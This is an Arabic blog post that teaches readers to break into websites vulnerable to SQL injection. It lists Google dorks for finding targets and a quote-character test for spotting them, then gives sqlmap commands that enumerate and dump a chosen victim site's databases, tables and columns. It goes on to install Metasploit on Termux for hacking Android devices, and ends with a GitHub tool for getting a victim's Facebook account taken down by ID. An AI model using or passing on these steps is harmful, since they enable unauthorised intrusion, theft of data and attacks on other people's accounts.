اهلا وسهلا بك في مدونتي .....
اختراق المواقع المصابه بثغره Sql بطريقه سهله وسريعه
عالم البرمجه
pub-7510082803923731
السلام عليكم و رحمه الله تعالى وبركاته اخواني الكرام مرحبا بكم في مدونتي الالكتروني
اليوم نتكلم عن اهم اداه في الاختراق الموقع الالكتروني
.......
شرحنا عن أداة sqlmap تعريفها : اداه لأختراق المواقع المصابة يثغرة SQL اي يمكن أختراقها عن طريق هذه الأداة بسب خطاء غير محدد في الموقع اوامر التحميل عندما تفتح الاداة تحتاج اولا الى ادواتها
وهي دوركات وقبل الدورك نهايات الموقع .. يجب ان تكون نهايته على الشكل التالي وتسمى دوركات(Dork) : دوركات
((((((((مثاااااااال)))))))) https://www.google.si/page.php?id="
واخرى مثله.....
"trainers.php?id=" "article.php?ID=" "games.php?id=" "newsDetail.php?id=" "staff.php?id=""products.php?id=""news_view.php?id=" "opinions.php?id=" "pages.php?id=" "prod_detail.php?id="
هل تريد مواقع مصابه لأيجاد موقع مصاب يجب عليك ان تنسخ احد الدوركات وتكتبه في بحث Google وستظهر عدة مواقع ..لتعرف اي واحدة منها مصابة يجب ان تنسخ رابط الموقع وتكتب بعده هذه النقطة( ’ او 1++1 )
واذا تغيرت الصفحه
وا ضهرت على شكل خطاء.. او ضهور كلمه MySql فهاذ يعني أن الموقع مصاب...وصار فيك انك تبدء الاختراق الموقع ...👌🤗 لبدء الأختراق: تنسخ رابط الموقع المراد اختراقه ..وتكتب هذه الاوامر ... ملاحظ مهمه ومكان كلمة (datsbases) تنسخ الاسم الذي يظهر في قائمة database 1. git clone https://github.com/sqlmapproject/sqlmap 2. cd sqlmap 3. ls 4. chmod +x sqlmap.py 5 .pyhthon2 sqlmap.py .....1..... python2 sqlmap.py -u (رابط الموقع المصاب ) --dbs s-- level=3 --risk=3 --batch ______________________________________________ .....2... python2 sqlmap.py -u (رابط الموقع المصاب) -D (name_dataase) --tables --level=3 --risk=3 --batch _____________________________________________ .....3..... python2 sqlmap.py -u (رابط الموقع المصاب) -D (NAME_database) -T (name_table) --columns --level=3 --risk=3 --batch _____________________________________________ ...4..... python2 sqlmap.py -u (رابط الموقع لمصاب) -D (NAME_database) -T (NAME_table) -C (NAME_column)dump --level=3 --risk=3 --batch
اداه metasploit وكيف يمكن أن تثبتها
أداة metasploit-framework وهي أهم اداة في Termux لتجربة عملية الاختراق لكل اجهزة الاندرويد وبدونها لا يمكن ان تتم اي عملية اختراق.
أوامر تثبيت الأداة :
pkg update &&
pkg upgrade
pkg install ruby
pkg install curl
pkg install git
pkg install python2
نكتب او نلصق هذا الامر بعد تثيبت الادوات:
curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh
سيقوم بتنزيل الاداة ويجب الانتظار حتى الانتهاء .
تفتح نافذة جديد وتكتب ls
ستظهر اداة اسمها metasploit.sh
تقوم بتشغيلها بالامر: chmod +x metasploit.sh
ستظهر لاللون الاخضر بعدها اكتب الامر bash metasploit.sh
هنا ستقوم بتنزيل كامل الاداة يجب الانتظار لتتنصب بشكل كامل
عند التنصيب ستظهر اداة جديدة وهي
أداة metasploit-framework لفتحها نكتب الامر:
cd metasploit-framework وبعدها ls
لفتح الاداة والعمل عليها نكتب الامر: msfconsole/. وهكذا تفتح الاداة بشكل سليم
سأشرح بالدرس القادم كيفية الاختراق او اوامر الاختراق والتجسس وشكرا للمتابعة
تطيير حساب فيسبوك.
اداة تقوم بتطير حسابات فيسبوك
اداه بسيطه جدا وسهل الاستخدام
الااومر 👇👇
apt update
apt upgrade
apt install python2
apt install python
apt install git
git clone https://github.com/IlayTamvan/Report
cd Report
ls
unzip Report.zip
python2 Report.py
بعدها تفتح الاداه حط id الضحيه وبعدها خلي termux يشوف شغله
نشركم على حسن المتابعه.... وانتضروني المره القادمه باقوى الادوات والبتكارات للاندرويد والكمبيوتر من ادوات او برامج و المزيد على قناتي عالم البرمجه هذه في البلوجر
_____😎______
تعليقات
إرسال تعليق